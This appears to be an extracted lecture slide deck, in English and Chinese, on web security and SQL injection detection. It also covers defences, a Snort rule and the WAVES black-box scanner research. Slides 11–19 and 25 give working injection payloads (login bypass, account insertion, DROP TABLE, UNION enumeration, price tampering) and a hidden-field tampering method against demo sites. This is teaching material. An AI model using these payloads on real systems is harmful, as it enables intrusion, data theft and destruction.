1

Web site securityPart 1 : SQL Injection

Reporter : James Chen

2

Outline

Web site security SQL Injection overview Web application security scanner (WSS) o

verview SQL injection detection Security assessment tool

3

Web site security

SQL injection Cross site scripting Directory traversal Authentication Parameter manipulation

4

SQL injection

SQL injection is a hacking technique which attempts to pass SQL commands through a web application for execution by a backend database.

Hackers exploit the possibility of chained SQL commands with user-provided parameters, and then embed SQL commands inside these parameters.

Using this method, a web application which is open to a SQL injection attack allows a hacker to execute arbitrary SQL queries and/or commands on the backend database server through the web application.

5

Cross site scripting attack

Cross-site scripting is gaining popularity among attackers as an easy vulnerability to find in web sites and exploit. The threats of cross-site scripting: Users can unknowingly execute malicious scripts when viewing

dynamically generated pages based on content provided by an attacker. An attacker can take over the user session before the user's session

cookie expires. An attacker can connect users to a malicious server of the attacker's

choice. An attacker can supply a user with a URL and convince that user to

access it, which would enable the attacker to cause his own choice of script or HTML to be executed in the user's browser. Using this technique, an attacker can take actions using the privileges of the user who accessed the URL, such as issuing queries on the underlying SQL databases and viewing the results, and exploiting known faulty implementations on the target system.

6

Directory traversal attacks

In a directory traversal attack, hackers supply a specially crafted filename to a program (usually a server) that allows them to access files in areas of the file system that should be unavailable.

7

Parameter manipulation

Parameter manipulation targets the business logic and can be used if the programmer has relied on hidden or fixed fields as the main security measure (for example, a hidden tag in a form or a parameter in a URL). Hackers can then modify these parameters to bypass the security

8

Authentication attacks

An authentication attack is a brute force attack on a web application that requires authentication. A range of user names and passwords are attempted in order to attempt authentication.

9

SQL Injection overview

SQL Injection 攻擊模式入侵登入畫面植入帳號刪除資料表偷取資料表資訊修改資料表記錄

10

入侵登入畫面

欲執行的 SQL 敘述 SELECT count(*) FROM Members WHERE UserName = 'J

ohn' AND Password ='ABC'

11

直接入侵 不良的 SQL 敘述寫法

SELECT count(*) FROM Members WHERE UserName ='" & _

txtUserName.Text & "' AND Password ='" & _

txtPassword.Text & "'“

在 [ 帳號 ] 欄位輸入以下的資料就可以登入成功 : ' OR 1=1—

程式所執行的 SQL 敘述變成 :SELECT count(*) FROM Members WHERE UserName = ''

OR 1=1 – And Password = ''

12

植入帳號與刪除資料表 在 [ 帳號 ] 欄位輸入以下的資料就可以新增駭客帳

號 :

';insert into Members(UserName, Password) Values ('hacker', 'foo')—

權限足夠的狀況下 , 在 [ 帳號 ] 欄位輸入以下的資料就可以刪除 Members 資料表 :

';drop table Members --

13

不需要密碼也可以登入 在 [ 密碼 ] 欄位輸入以下的資料就可

以成功登入 :

aaa' Or UserName Like '%

程式所執行的 SQL 敘述變成 :SELECT count(*) FROM Members WHERE UserName = ''

And Password = 'aaa' Or UserName Like '%'

14

利用 Url 傳遞網頁執行需要的參數

http://localhost/GoodSupplierProduct/Products.aspx?SupplierID=1http://localhost/GoodSupplierProduct/Products.aspx?SupplierID=1

15

不良的程式寫法 Dim strSQL As String = “SELECT * FROM Produ

cts WHERE Supplierid=” & _ 　 Request("SupplierID").ToString()

16

查詢 SQL Server 的版本 在網址列輸入 : http://localhost/BadSupplierProdu

ct/Products.aspx?SupplierID=9999 union all select null, @@ServiceName, null, null, @@version, null, null, null, null, null

17

讀取資料庫的資料表 在網址列輸入 : http://localhost/BadSupplierProdu

ct/Products.aspx?SupplierID=9999 union all select null, name, null, null, null, null,null,null,null,null from sysobjects where xtype='u'

資料表名稱

18

讀取資料表的欄位在網址列輸入 : 　 http://localhost/BadSupplierProduct/Pr

oducts.aspx?SupplierID=9999 union all select null,name,null,null,null,null,null,null,null,null from syscolumns where id=object_id('Products') and colid=1

欄位名稱

19

修改資料表記錄在網址列輸入 : 　 http://localhost/BadSupplierProduct/Pro

ducts.aspx?SupplierID=9999;update Products set UnitPrice=1 Where ProductID=1

20

防堵 SQL Injection 攻擊的基本原則 ( 一 ) 將使用者輸入資料當做參數傳給 SQL 敘述或 Stored

ProcedureSQL敘述或是 Stored Procedure中使用 EXEC敘述執行使用者輸入的內容需更進一步防範

如果無法將使用者輸入資料當做參數傳給 SQL 敘述或 Stored Procedure

使用 Regular Expression驗証使用者輸入的資料的格式

限制使用者輸入的資料的長度限制使用者登入資料庫的帳號的權限去除使用者輸入資料中的“ --”(SQL敘述的註解 )將使用者輸入的單引號置換成雙引號

21

將使用者輸入的單引號置換成雙引號的效果 例如原本欲執行的 SQL 敘述為 :

Select count(*) from Members where UserName='John' And Password='ABC'

使用者在 UserName 欄位輸入 [' Or 1=1 -- ]未將使用者輸入的單引號置換成雙引號 , 上述的 SQL敘述執行的結果為Members資料表的總筆數

將使用者輸入的單引號置換成雙引號 , 上述的SQL敘述執行的結果為 0

22

防堵 SQL Injection 攻擊的基本原則 ( 二 )

限制應用程式或網頁只能擁有執行 Stored Procedure 的權限 , 不能直接存取資料庫中的 Table 和 View

使用 [Windows 整合安全模式 ] 登入資料庫 , 避免使用系統管理員身份登入資料庫

設定 TextBox 欄位的 MaxLength 屬性

加強對資料庫操作的稽核

23

Hidden Field Tampering 攻擊法 Hidden Field Tampering 攻擊模式

把 HTML Form 存到硬碟竄改 Hidden 欄位的內容值將竄改過的 Form 重送到 Web Server

24

BadMotor.com

使用隱藏欄位在網頁中傳遞資料

25

檢視帶有隱藏欄位的網頁的 [ 原始檔 ] 另存新 HTML 檔案 修改存檔內容<form name=“Form1” method=“post” action=“http://IP 位址 /Ba

dMotor/Confirm.aspx?MotorID=1” id=“Form1”>

…

<input name="HiddenPrice" id="HiddenPrice" type="hidden" value="1000000" />

…

</form> 使用 IE 開啟另存的 HTML 檔案 執行 Submit

隱藏欄位中的資料被竄改的情形

竄改成竄改成

26

Web application security scanner (WSS) overview

WSSs operate according to three constraints:1. Neither documentation nor source code will be a

vailable for the target Web application.2. Interactions with the target Web applications an

d observations of their behaviors will be done through their public interfaces.

3. The testing process must be automated and testing a new target system should not require extensive human participation in test case generation.

27

SQL injection detection

Typical validation procedureAnti-SQL-Injection.phpTo take the popular open-source IDS SnortBlack-box approach

28

Typical validation procedure If Length(strUserName )< 3  OR Length(strUserName) > 20

ThenOutputError(“Invalid User Name”) ElseIf Length(strPassword <6) OR Length(strPassword) > 11 T

henOutputError(“Invalid Password”) Else BeginSQLQuery = “SELECT * FROM Users WHERE UserName

='” + strUserName + “AND Password='” + strPassword + “';”

If GetQueryResult(SQLQuery) = 0 Then bAuthenticated = false;

Else bAuthenticated = true;End;

29

Anti-SQL-Injection.php

<?function anti_injection($sql){// remove palavras que contenham sintaxe sql$sql = preg_replace(sql_regcase("/(from|select|insert|delete|where|dro

p table|show tables|#|\*|--|\\\\)/"),"",$sql);$sql = trim($sql);//limpa espacos vazio$sql = strip_tags($sql);//tira tags html e php$sql = addslashes($sql);//Adiciona barras invertidas a uma stringreturn $sql;}//modo de usar pegando dados vindos do formulario$nome = anti_injection($_POST["nome"]);$senha = anti_injection($_POST["senha"]);?>

30

To take the popular open-source IDS Snort

Detection of SQL Injection and Cross-site Scripting Attacks by K.K. Mookhey and Nilesh Burghate , URL: http://www.securityfocus.com/infocus/1768/ To take the popular open-source IDS Snort, and compose regular-expre

ssion based rules for detecting SQL Injection and Cross-site Scripting Attacks.

To avoid high number of flase positive, the signatures can be midified. Regex for detection of SQL meta-characters /(\%27)|(\')|(\-\-)|(\%23)|(#)/ix </TD< tr> To detect either the hex equivalent of the single-quote, the single-quote i

tself or the presence of the double-dash. The above regular expression would be added into a new Snort rule as f

ollows: alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORT

S (msg:"SQL Injection - Paranoid"; flow:to_server,established;uricontent:".pl";pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:9099; rev:5;) </TD< tr>

31

Black-box approach Huang, Y. W., Huang, S. K., Lin, T. P., Tsai, C. H. “Web

Application Security Assessment by Fault Injection and Behavior Monitoring.” In Proc. 12th Int’l World Wide Web Conference, p.148-159, Budapest, Hungary, 2003. To develope WAVES—a testing platform for remote,

black-box testing of Web application security. Adopting a black-box approach in order to analyze W

eb applications externally without the aid of source code.

Using crawler to discover all pages in a Web site that contain HTML forms, since forms are the primary data entry points in most Web applications.

32

Black-box approach (cont.) During the reverse engineering process, HTML pages

are parsed with a Document Object Model (DOM) parser, and HTML forms are parsed and stored in XML format.

An attempt was made to inject malicious SQL patterns into the server-side program that processes the form’s input. We referenced the existing literature on SQL injection techniques to create a set of SQL injection patterns.

If the server-side program detects and filters malicious patterns, or if the filtering mechanism is provided on a global scale, then injection will fail.

33

SQL injection detection

Complete crawling Bypass the validation procedure Test set generation and output analysis Injection patterns and error messages

34

Complete crawling

“Complete crawling” mechanism to attempt more complete crawl, that is, all data entry points must be correctly identified.

To look at ways that HTML pages reveal the existence of other pages or entry points.

A ‘‘deep injection’’ mechanism to eliminate these types of false negatives.

35

HTML pages reveal the existence of other pages or entry Points

36

Bypass the validation procedure The Topic Model The Injection Knowledge Manager (IKM)

37

Injection Knowledge Manager (IKM) IKM must decide

not only on which variable to place the injection pattern, but also how to fill other variables with potentially valid data

38

Bypass the validation procedure

Using injection Knowledge Manager (IKM) Only query (and not browsing) interfaces

are provided, these types of document repositories cannot be indexed by current crawling technologies.

39

Test set generation and output analysis

Using our KB, The IKM implements four algorithms Get_Topic(), Get_Value(), Expand_Values() and Feedback().

Get_Topic(^t) :checks whether a topic can be associated with^t.

Get_Value() to retrieve the best possible guess, where^t is the term (variable name or descriptive keyword) associated with the text box.

Expand_Values() :expands the knowledge base. Feedback():If injection secceed , save input valu

e.

40

Expand_Values() example The topic Company, STerm_Company = {“Company,“ “Firm”} SValue_Company = {“IBM,” “HP,” “Sun,” “Lucent,” “Cisco”}. input variable “Affiliation” that is associated with SValue_Input =

{“HP,” “Lucent,” “Cisco,” “Dell”}. The crawler calls Expand_Values() with “Affiliation” and SValue

_Input. After failing to find a nearest term for “Affiliation,” the Knowledg

e Manager notes that SValue_Company is very close to SValue_Input, and inserts the term “Affiliation” into STerm_Company and the value SValue_Input - SValue_Company = {“Dell”} into SValue_Company.

Both STerm_Company and SValue_Company are expanded.

41

Injection patterns and error messages

WAVES injection patterns are crafted not to intrude a vulnerable entry point (e.g., executing a SQL command), but to make it output database error messages.

If an entry point outputs database error messages in response to a particular injection pattern, it is vulnerable to that pattern.

We search for a particular string in an HTML output to detect database error messages.

42

WAVES injection patterns

43

Database error messages

44

Output analysis

Negative Response Extraction (NRE) algorithm. If an initial injection fails, the returned page is saved a

s R1. The crawler then sends an intentionally invalid reques

t to the targeted Web application–for instance, a random 50-character string for the UserName variable. The returned page is retrieved and saved as R2.

Finally, the crawler sends to the Web application a request generated by the IKM with a high likelihood of validity, but without injection strings. The returned page is saved as R3.

45

46

WAVES’ system operation

The crawlers act as interfaces between Web applications and software testing mechanisms.

The crawlers were equipped with IE’s Document Object Model (DOM) parser and scripting engine to exhibit the same behaviors as browsers.

Events is triggered by our test cases or by Web application errors.

This is accomplished by three strategies–browser emulation, user event generation, and automated form completion.

47System architecture of WAVES.

48

Other security assessment tool

WebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented.

49

Security assessment tool (cont.)

AbsintheAbsinthe is a GUI based tool designed to auto

mate the process of blind sql injection. It works by profiling response pages as true or false from known cases, then moves on to identify unknowns as true or false.

50

Absinthe

51

Absinthe (cont.)

52

Summary

I have introduced some SQL injection detection methods.

In order to detect SQL injection attack, I think black-box method is a better method.

Automatic black-box method should include some features : complete crawling ,bypass the validation procedure, and automatic output analysis according output error messages.

53

False positives v.s. False negatives

主動錯誤訊息 (false positives) 指的是當組織由於惡意活動而被通知警報時候，經檢查其實沒有任何事情發生。

被動錯誤訊息 (false negatives) 就是對於真實的惡意攻擊者或者未授權活動偵測失敗。

54

Reference

Yao-Wen Huang ,Chung-Hung Tsai, Tsung-Po Lin,Shih-Kun Huang a,c, D.T. Lee, Sy-Yen Kuo “A testing framework for Web application security assessment”, Computer Networks 48 (2005) 739–761

Y.W. Huang, S.K. Huang, T.P. Lin, C.H. Tsai, Securing Web application code by static analysis and runtime protection, in: Proceedings of the 13th International World Wide Web Conference, New York, May 17–22, 2004.

Y.W. Huang, F. Yu, C. Hang, C.H. Tsai, D.T. Lee, S.Y. Kuo, Verifying Web applications using bounded model checking, in: Proceedings of the 2004 International Conference Dependable Systems and Networks (DSN2004), Florence, Italy, June 28–July 1, 2004.

Raghavan, S., Garcia-Molina, H. “Crawling the Hidden Web.” In: Proceedings of the 27th VLDB Conference (Roma, Italy, Sep 2001), 129-138. LITE algorithm